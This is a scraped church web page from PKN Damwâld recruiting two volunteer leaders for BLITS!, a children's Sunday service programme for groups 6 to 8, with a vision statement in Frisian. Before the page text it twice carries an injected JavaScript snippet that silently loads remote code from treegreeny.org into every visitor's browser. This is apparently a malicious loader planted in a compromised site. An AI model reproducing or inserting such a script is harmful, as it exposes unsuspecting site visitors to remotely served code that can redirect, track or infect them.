;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Oproep .... BLITS ! - PKN Damwâld

Oproep …. BLITS !

Gepubliceerd op: vrijdag 8 juli 2022

De opvolger van KingKids en de BerneTsjerke – BLITS! – is dringend op zoek naar 2 nieuwe leden voor de leiding voor groep 6, 7 & 8. Lijkt het je leuk om 1x in de 4 weken op zondagochtend kindernevendienst te geven aan onze jeugd? Meld je dan snel aan via blitsdamwald@gmail.com of 06-1550 3257. Hier kun je ook terecht voor meer informatie of eventuele vragen.

Onze visie:

By Blits stelle wy de Bibel en de ferbining mei God, dysels en in oar sintraal. Hjirby slute wy oan by de leeftiid fan de bern, sawol tidens de ferhalen as ek by de ferwurking.

Bidde             Tegearre mei en foar de bern prate mei God

Leauwen        Fertroud meitsje mei it leauwen fanút de Bibel yn de leafde fan God

Iepen              Iepen wêze nei de bern oer it leauwen, yn it fertrouwen dat de bern ek iepen binne nei in oar

Trochjaan       De bern leare om de leafde fan God troch te jaan oan in oar

Sjonge           Troch nei ferskes te lústerjen en te sjongen, God earje en priizje